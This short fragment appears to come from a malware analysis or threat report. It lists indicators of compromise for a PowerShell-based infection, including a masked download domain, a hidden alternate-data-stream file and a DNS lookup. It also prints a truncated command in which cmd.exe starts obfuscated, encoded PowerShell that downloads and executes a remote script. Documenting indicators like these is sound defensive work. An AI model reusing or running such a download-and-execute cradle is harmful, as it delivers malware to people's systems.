Technical Information
- http://so######idancesystem.com/en/aguu.ps1
- %TEMP%\icon.txt:icon.png
- 'so######idancesystem.com':80
- DNS ASK so######idancesystem.com
- '<SYSTEM32>\cmd.exe' /C Echo poWErsHell.Exe -ex bypaSS -nOP -w 1 -ec SQBFAFgAKAAoAG4AZQB3AC0AbwBiAGoAZQBDAFQAIAAgAE4ARQBUAC4AdwBFAGIAYwBMAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABPAGEAZABzAFQAUgBpAG4AZwAoACcAaAB0AHQAcAA6AC...
- '<SYSTEM32>\cmd.exe' -